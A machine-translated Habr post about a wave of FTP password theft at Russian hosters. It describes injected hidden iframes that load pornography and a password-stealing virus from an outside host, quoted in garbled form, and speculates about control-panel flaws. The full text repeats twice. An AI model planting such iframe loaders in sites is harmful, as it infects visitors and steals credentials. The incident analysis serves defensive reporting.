A wave of theft of FTP passwords: Hackers, hosters and naked women
Here my friend and colleague wrote an interesting article:
From the official statement of representatives of the company "Masterhost"
“Over the past few days, specialists of the technical security service of the company .masterhost have recorded a sharp increase in the incidence of theft of FTP access details from users' computers. Chances are that these are targeted wave attacks of Trojans or viruses that carry out various unauthorized actions by you. Our specialists, together with partner companies specializing in information security solutions, are actively studying malicious traffic in order to localize the focus of malicious attacks ... "
What happened?
One fine morning naked women appeared on the main and other pages of several sites. At the level of the HTML code, it looked like this:
')
andframe src = 'http: //lem0n.info/km/ya.php' width = 1 height = 1 andframe
andframe src = 'http: //lem0n.info/km/love.htm' width = 1 height = 1 andframe
These lines were inserted into index.php, index.htm, index.html
When the visitor loaded the page, the virus tried to load (fortunately, the anti-virus did not miss it) and, in addition to the normal content of the site, various naked women were loaded.
The difficulty was that there was a file edit on the FTP. They suspected that the administration system was hacked, but everything turned out to be completely different. A project hacked in HTML was hacked, there was no PHP in it. In addition, CHMOD was 644 everywhere, which means that either the owner or root could edit the files.
Who did this?
Of course, we requested the masterhost logs for visits to the FTP sites on that “walpurgis night”. A domain bound IP address SPORT.MCHOST.RU was discovered, from which they logged on to FTP - 84.252.148.70. This made it clear that root has nothing to do with it. When entering mchost.ru , a kind of vague hosting was found, having only email and an ICQ number in the “contacts” and Yandex money in the “payment methods”. In other words, the location of this hosting, even from a satellite, is hardly bearing. It is quite obvious that this server was simply hacked and used as a platform for attack. The owner of the hosting, of course, never recognizes this, and therefore, will not give any logs. That, alas, leaves the intruder out of range.
How hacked sites?
The .masterhost logs confirm the presence of a ftp call to the site, which means someone knew the passwords. It is unlikely that the password is picked up. A more plausible version seemed to us, suggesting the presence of searching on the local computer and sending viruses passwords to somewhere. Adequate precautions against such attacks are known to all. The case seemed to be solved, but ... Many sites were hacked. A person who knew all these passwords at the same time did not exist. Google suggested that we were not alone in the universe: a whole wave of such hacks had passed through the network.
findings
The mass character of such hacks suggests that it is not only viruses that send passwords, but also hosters. It is hard to believe that all the victims were caught in the virus. How can I hack the host and find out the passwords on the FTP? This was hardly a FreeBSD hack - there are many reasons. It is necessary to agree with those who believe that this was a hack of the control panel.
1. The control panel has access to passwords on ftp (as it can be changed with its help), therefore, a certain request allows you to get at least a list of password hashes (perhaps the passwords themselves).
2. Hacked many hosters. Consequently, they all have the same vulnerability in the control panel. Of course, neither masterhost nor other hosters will ever admit this directly. However, some of their statements on the topic of hacking confirm the version of the control panel hacking.
Example: Valuehost
What has been done now:
+ uses a new algorithm for storing FTP passwords to protect against hacking;
+ a function has been introduced in the control panel for setting the number of days the new password is aging;
+ The function of blocking access via FTP has been introduced if you are not going to update the site for a long time.
New password storage algorithm, password aging feature - innovations that help protect against password theft by brute force. So, before this, someone still had the opportunity to sort through passwords.
The function of blocking access via FTP has been introduced if you are not going to update the site for a long time - a deadly point. Hosters, despite the measures taken, cannot guarantee full password protection on FTP and offer me to disable FTP access for general security purposes.
Masterhost is more cautious in statements, but the hacking evidence confirms that he has similar problems. Of course, you need to understand that initially the problem lies in the software installed as a control panel, but the position of the hoster is still wrong. He did not bother with developing his own control panel, and if he did, he didn’t protect her well.
The results of thinking on this issue are very deplorable: if the agave and masterhost were hacked, what to say about other hosts. It remains to hope and believe that the hosters will be engaged in the development of their control panels and make the appropriate protection, and people, in turn, will more carefully protect their passwords and protect themselves from viruses. Hope, as is known, dies last ...
Necessary addition
The virus that tried to boot from hacked sites really finds and sends passwords from your computer. We have so hacked 2 ftp account on our working server, which basically has no control panel, and in the access logs there is no attempt to bust passwords on the ftp. So you also need to protect your computers and take storage of passwords more seriously.
From the official statement of representatives of the company "Masterhost"
“In order to reduce the risk of infection of your computer, we also advise you to update the anti-virus software, including the anti-virus database, in a timely manner. your resources and be sure to check your personal computer with the latest anti-virus software. ”
Technical Director of Creative People
A. Lebedev
From the official statement of representatives of the company "Masterhost"
“Over the past few days, specialists of the technical security service of the company .masterhost have recorded a sharp increase in the incidence of theft of FTP access details from users' computers. Chances are that these are targeted wave attacks of Trojans or viruses that carry out various unauthorized actions by you. Our specialists, together with partner companies specializing in information security solutions, are actively studying malicious traffic in order to localize the focus of malicious attacks ... "
What happened?
One fine morning naked women appeared on the main and other pages of several sites. At the level of the HTML code, it looked like this:
')
andframe src = 'http: //lem0n.info/km/ya.php' width = 1 height = 1 andframe
andframe src = 'http: //lem0n.info/km/love.htm' width = 1 height = 1 andframe
These lines were inserted into index.php, index.htm, index.html
When the visitor loaded the page, the virus tried to load (fortunately, the anti-virus did not miss it) and, in addition to the normal content of the site, various naked women were loaded.
The difficulty was that there was a file edit on the FTP. They suspected that the administration system was hacked, but everything turned out to be completely different. A project hacked in HTML was hacked, there was no PHP in it. In addition, CHMOD was 644 everywhere, which means that either the owner or root could edit the files.
Who did this?
Of course, we requested the masterhost logs for visits to the FTP sites on that “walpurgis night”. A domain bound IP address SPORT.MCHOST.RU was discovered, from which they logged on to FTP - 84.252.148.70. This made it clear that root has nothing to do with it. When entering mchost.ru , a kind of vague hosting was found, having only email and an ICQ number in the “contacts” and Yandex money in the “payment methods”. In other words, the location of this hosting, even from a satellite, is hardly bearing. It is quite obvious that this server was simply hacked and used as a platform for attack. The owner of the hosting, of course, never recognizes this, and therefore, will not give any logs. That, alas, leaves the intruder out of range.
How hacked sites?
The .masterhost logs confirm the presence of a ftp call to the site, which means someone knew the passwords. It is unlikely that the password is picked up. A more plausible version seemed to us, suggesting the presence of searching on the local computer and sending viruses passwords to somewhere. Adequate precautions against such attacks are known to all. The case seemed to be solved, but ... Many sites were hacked. A person who knew all these passwords at the same time did not exist. Google suggested that we were not alone in the universe: a whole wave of such hacks had passed through the network.
findings
The mass character of such hacks suggests that it is not only viruses that send passwords, but also hosters. It is hard to believe that all the victims were caught in the virus. How can I hack the host and find out the passwords on the FTP? This was hardly a FreeBSD hack - there are many reasons. It is necessary to agree with those who believe that this was a hack of the control panel.
1. The control panel has access to passwords on ftp (as it can be changed with its help), therefore, a certain request allows you to get at least a list of password hashes (perhaps the passwords themselves).
2. Hacked many hosters. Consequently, they all have the same vulnerability in the control panel. Of course, neither masterhost nor other hosters will ever admit this directly. However, some of their statements on the topic of hacking confirm the version of the control panel hacking.
Example: Valuehost
What has been done now:
+ uses a new algorithm for storing FTP passwords to protect against hacking;
+ a function has been introduced in the control panel for setting the number of days the new password is aging;
+ The function of blocking access via FTP has been introduced if you are not going to update the site for a long time.
New password storage algorithm, password aging feature - innovations that help protect against password theft by brute force. So, before this, someone still had the opportunity to sort through passwords.
The function of blocking access via FTP has been introduced if you are not going to update the site for a long time - a deadly point. Hosters, despite the measures taken, cannot guarantee full password protection on FTP and offer me to disable FTP access for general security purposes.
Masterhost is more cautious in statements, but the hacking evidence confirms that he has similar problems. Of course, you need to understand that initially the problem lies in the software installed as a control panel, but the position of the hoster is still wrong. He did not bother with developing his own control panel, and if he did, he didn’t protect her well.
The results of thinking on this issue are very deplorable: if the agave and masterhost were hacked, what to say about other hosts. It remains to hope and believe that the hosters will be engaged in the development of their control panels and make the appropriate protection, and people, in turn, will more carefully protect their passwords and protect themselves from viruses. Hope, as is known, dies last ...
Necessary addition
The virus that tried to boot from hacked sites really finds and sends passwords from your computer. We have so hacked 2 ftp account on our working server, which basically has no control panel, and in the access logs there is no attempt to bust passwords on the ftp. So you also need to protect your computers and take storage of passwords more seriously.
From the official statement of representatives of the company "Masterhost"
“In order to reduce the risk of infection of your computer, we also advise you to update the anti-virus software, including the anti-virus database, in a timely manner. your resources and be sure to check your personal computer with the latest anti-virus software. ”
Technical Director of Creative People
A. Lebedev
Source: https://habr.com/ru/post/6028/
All Articles